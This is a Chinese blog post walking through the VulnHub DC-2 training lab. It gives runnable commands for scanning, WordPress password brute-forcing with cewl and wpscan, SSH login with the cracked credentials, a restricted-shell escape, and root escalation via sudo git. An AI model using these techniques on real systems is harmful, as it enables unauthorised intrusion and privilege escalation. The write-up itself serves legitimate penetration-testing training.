漏洞复现 -- DC-2

于 2024-08-22 16:23:25 发布
阅读量95 收藏 3
点赞数
文章标签: 网络安全 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80854251/article/details/141431406
版权

靶场地址

https://download.vulnhub.com/dc/DC-2.zip

目标

找到五个flag

漏洞复现

flag1

sudo arp-scan -l
# 主机发现

nmap -p- 192.168.222.138 --min-rate=5000
# 开放端口扫描

http://192.168.222.138:80

本地访问不了自动跳转到DC-2,应该是给重定向了

在本地hosts文件中添加 192.168.222.138 dc-2

重新访问 http://192.168.222.138:80

flag2

dirsearch -u "http://192.168.222.138:80" -x 403 404
# 扫描网站目录,看看是否有有用信息

http://dc-2/wp-login.php

接下来就该破解账号密码了,通过flag1提示我们需要用到cewl工具
cewl http://dc-2/ -w /home/kali/Desktop/dict.txt
# 爬取http://dc-2/网站生成的字典,放在桌面上的dict.txt文件中

wpscan --url dc-2 -e u
# 使用wpscan工具爆破用户名
扫描出三个用户名:admin、jerry、tom,将这三个用户名放在桌面的user.txt下,方便下一步的密码爆破

wpscan --url dc-2 -U /home/kali/Desktop/user.txt -P /home/kali/Desktop/dict.txt
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

使用jerry/adipiscing,登录进去后,找到flag2

flag3

跟上flag2的提示,我们不能使用CMS漏洞来获取shell,在最开始扫描端口的时候,我们看到这个网站将SSH端口改为了7744,我们已经得到了账号密码可以尝试ssh登录
ssh jerry@192.168.222.138 -p 7744 
adipiscing
# 使用jerry的密码登录失败

ssh tom@192.168.222.138 -p 7744 
parturient
# 登陆成功

ls
cat flag3.txt
发现cat命令被禁用了,我们查看还有哪些命令可执行

compgen -c       
# 查看可以使用的指令

使用vi命令查看flag3.txt

vi flag3.txt

猜测需要我们进行提权

flag4

既然vi可以用,我们可以进行vi提权
vi flag3.txt
esc --> : --> set shell=/bin/bash --> 回车 --> esc --> : --> shell --> 回车
# 当退出vi界面的时候,就提权成功了
cd ..
ls
cd jerry
vi flag4.txt

final-flag

export -p        							 //查看环境变量
BASH_CMDS[a]=/bin/sh;a         //把/bin/sh给a
/bin/bash
export PATH=$PATH:/bin/        //添加环境变量
export PATH=$PATH:/usr/bin     //添加环境变量

# rbash提权成功

sudo -l
# 查看可以进行提权的命令,提升我们可以使用git提权

sudo git help config / sudo git -p help
回车然后输入!/bin/bash

cd /
find / -name *flag*

cat /root/final-flag.txt

总结

1、cewl(自定义单词列表生成器

语法格式:
  cewl <url> [options]
常用参数:
  -w,--write			将输出的结果写入到文件
  -h,--help				显示帮助



cewl http://dc-2/ -w /home/kali/Desktop/dict.txt
# 爬取http://dc-2/网站生成的字典,放在桌面上的dict.txt文件中

2、wpscan(漏洞扫描工具)

语法格式:
  wpscan --url <url>
常用参数:
  -U						指定用户名列表
  -P						指定密码列表

wpscan --url dc-2 -U /home/kali/Desktop/user.txt -P /home/kali/Desktop/dict.txt
# 使用指定的user字典和指定dict字典爆破出user用户对应的password

3、rbash 环境变量提权

export -p        							  //查看环境变量
BASH_CMDS[a]=/bin/sh;a          //把/bin/sh给a
/bin/bash
export PATH=$PATH:/bin/         //添加环境变量
export PATH=$PATH:/usr/bin      //添加环境变量

https://www.freebuf.com/articles/system/188989.html

4、git 提权

sudo git help config / sudo git -p help
回车然后输入!/bin/bash
冷酷小帅~0x7e
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞复现-zabbix系列
aming小老弟
01-09 5714
Zabbix SIA Zabbix是拉脱维亚Zabbix SIA公司的一套开源的监控系统。基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。该系统支持网络监控、服务器监控、云监控和应用监控等。能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。zabbix由2部分构成,zabbix server与可选组件zabbix agent。
漏洞复现 -- DC-1
最新发布
2301_80854251的博客
08-22 205
漏洞复现 -- DC-1
漏洞复现-Joomla
aming小老弟
10-03 463
渗透
漏洞复现-泛微WeaverOA系列
aming小老弟
10-03 1163
泛微OA
漏洞复现-easy_tornado
qq_59350385的博客
07-04 285
windowsFirefoxtornado是python中的一个web应用框架。拿到题目发现有三个文件:flag.txt 发现flag在/fllllllllllllag文件里;welcome.txt render是python中的一个渲染函数,渲染变量到模板中,即可以通过传递不同的参数形成不同的页面。hints.txt filehash=md5(cookie_secret+md5(filename)) 现在filename=/fllllllllllllag,只需要知道cookie_secret的
vulnhub靶场漏洞复现DC-3漏洞复现
qq_61702710的博客
07-19 759
DC-3跟DC-1一样是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。
【无标题】DC-1漏洞复现
babywhale_bi的博客
12-18 2108
DC1 实验背景:DC-1是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。】 DC-1提权关键词:find 攻击机ip:192.168.127.133 DC1靶机ip:192.168.127.136 目标:获取靶机上的5个flag 1.内网渗透,先利用namp扫描整个网段 目标机为192.168.127.136 首先去官网下载DC-1,用VM打开后,使它与靶机处于NAT模式,此时用主机扫描同一网段主机扫描到DC-1靶机的ip, .继续nmap嗅探端口信息 开放了
xdcms漏洞合集-漏洞复现
zkaqlaoniao的博客
11-09 1219
XDcms订餐网站管理系统,主要使用Php+Mysql+Smarty技术基础进行开发,采用OOP(面向对象)方式进行基础运行框架搭建,集成在线订餐、团购、积分商城、优惠券、新闻、在线订单、在线支付、生成订单短信/邮箱通知、点评、Google电子地图、问答、并与支付宝、Dz论坛、短信平台接口完美整合等功能于一体的完全开源的高级订餐网站管理系统。作为国内最受欢迎的PHP类订餐网站系统之一,XDcms在不断提升用户服务、提高产品质量的同时更加注重用户体验。
vulnhub渗透测试DC-2漏洞复现
qq_61702710的博客
07-18 583
实验背景:DC-2跟DC-1一样是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。
simulink仿真-PFC、DC-DC
04-12
在电力电子领域,Simulink被广泛用于设计和仿真各种电源转换系统,如PFC(功率因数校正)和DC-DC转换器。本文将深入探讨标题和描述中涉及的"simulink仿真-PFC、DC-DC"的相关知识点。 首先,我们来看功率因数校正...
AC-DC典型电源电路
03-20
AC-DC典型电源电路
DC-DC内部功耗的计算
08-03
影响开关模式、DC-DC 转换器效率的主要原因
HCIE-DC实验指导.pdf
08-12
实验一:HCIE-DC实验环境准备,其中包括检查设备是否齐全、实际设备组网连线、设备配置清空,通过实验一的操作,帮助熟悉HCIE-DC设备及物理拓扑搭建 实验二:DC二层网络配置实验,通过基本的操作与配置,帮助熟悉...
DC-DC PCB layout 指导.docx
06-18
DC-DC PCB Layout 指导 DC-DC PCB 布局是影响 DC-DC 转换器性能的关键因素之一。与 LDO 相比,DC-DC 电路的布局要求更高,因为它具有更高的噪声和更复杂的电路结构。因此,了解 DC-DC 布局的重要性和设计原则是非常...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8405
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
AI安全-文生图
深度安全实验室
08-15 455
AI安全-文生图
探索802.1X:构筑安全网络的认证之盾
XINERTEL的博客
08-21 715
首先,让我们了解一下什么是802.1x。802.1x是一个基于端口的网络访问控制机制,由IEEE(电气电子工程师学会)开发,属于IEEE 802.1标准家族。它的主要作用是通过认证管理用户和设备对网络的访问权限。更通俗地说,802.1x就像是网络的门卫,负责检查每一个试图进入网络的设备或用户的身份,只有通过认证的合法用户才能进入。这不仅可以防止未授权的设备接入,还可以确保网络的安全和稳定。
CISAW安全集成和别的类型有什么区别
2402_84109700的博客
08-21 191
对于CISAW安全运维方向,申请人须通过相应的考试,并且满足以下任一条件:具有硕士及以上学位并有2年信息安全相关工作经验,其中至少1年与安全运维相关;其次,CISAW的安全集成方向侧重于评估申请人在信息系统安全集成方面的基础知识和技能的掌握程度,以及运用这些知识分析和解决安全集成问题的能力。- 对于CISAW安全集成方向,申请人同样需要通过相应考试,并满足类似的工作经验要求,但针对的是安全集成领域的专业经验。- 对于CISAW安全管理方向,报名条件与前两者相似,但侧重于风险管理专业方向的相关工作经验。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值